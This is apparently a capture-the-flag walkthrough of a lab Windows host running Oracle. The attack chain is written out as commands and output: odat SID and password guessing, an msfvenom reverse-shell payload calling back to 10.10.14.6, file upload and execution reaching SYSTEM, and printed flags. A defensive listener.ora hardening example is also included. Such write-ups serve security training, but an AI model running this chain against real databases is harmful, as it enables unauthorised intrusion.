Service overview
$ /opt/nmapAutomator/nmapAutomator.sh -H 10.10.10.82 -t Full
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-01T10:05:35
|_ start_date: 2021-06-01T09:57:54
Oracle TNS listener poisoning (CVE-2012-1675): https://github.com/bongbongco/CVE-2012-1675
$ nmap -Pn -sT --script=+oracle-tns-poison -p 1521 10.10.10.82
PORT STATE SERVICE
1521/tcp open oracle
|_oracle-tns-poison: Host is vulnerable!
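The "Host is vulnerable!" result above means the listener accepts remote instance registration from anyone. As an added example (not part of this writeup), here is a listener.ora that restricts registration; it assumes the listener is named LISTENER and the SID is XE as found by the scan, the ORACLE_HOME path is a placeholder, and the exact parameters available depend on the Oracle version (the dynamic-registration parameters exist from 11.2.0.4 and 12c; 11.2.0.2 such as the XE on this host needs the vendor's COST fix instead).

```ini
# --- weak: default listener, dynamic registration accepted from any host ---
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db-host)(PORT = 1521))
    )
  )

# --- hardened (11.2.0.4 / 12c and later) ---
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db-host)(PORT = 1521))
    )
  )

# Accept instance registration only from the local node
# (add REGISTRATION_INVITED_NODES_LISTENER = (host1, host2) for RAC/remote instances).
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON

# If no remote instance ever needs to register, turn dynamic registration off
# entirely and serve the local instance through a static SID list instead.
DYNAMIC_REGISTRATION_LISTENER = OFF

SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC =
      (SID_NAME = XE)
      (ORACLE_HOME = C:\oraclexe\app\oracle\product\11.2.0\server)   # placeholder path
    )
  )

# --- hardened (11.2.0.2 with the COST patch applied) ---
# Registration is only accepted over the IPC endpoint, which a remote host
# cannot reach; TCP clients can still connect to the database normally.
SECURE_REGISTER_LISTENER = (IPC)
```

After restarting the listener, re-running the oracle-tns-poison script above should no longer report the host as vulnerable.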
Public exploit
odat standalone build:
https://github.com/quentinhardy/odat/releases/download/5.1/odat-linux-libc2.12-x86_64.tar.gz
Finding SIDs:
$ ./odat-libc2.12-x86_64 sidguesser -s 10.10.10.82 -p 1521
[+] SIDs found on the 10.10.10.82:1521 server: XE
$ wget https://raw.githubusercontent.com/quentinhardy/odat/master-python3/accounts/accounts.txt
Finding passwords:
$ ./odat-libc2.12-x86_64 passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts.txt
=> scott:tiger
Shell
$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f exe -o shell.exe
$ ./odat-libc2.12-x86_64 utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe shell.exe
[1] (10.10.10.82:1521): Put the shell.exe local file in the c:/ folder like shell.exe on the 10.10.10.82 server
[+] The shell.exe file was created on the c:/ directory on the 10.10.10.82 server like the shell.exe file
$ msfconsole
$ ./odat-libc2.12-x86_64 externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec C:/ shell.exe
Flags
> whoami
nt authority\system
C:\Users\Phineas\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.82
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Phineas\Desktop>type user.txt
92ede778a1cc8d27cb6623055c331617
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.82
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>type root.txt
cd39ea0af657a495e33bc59c7836faf6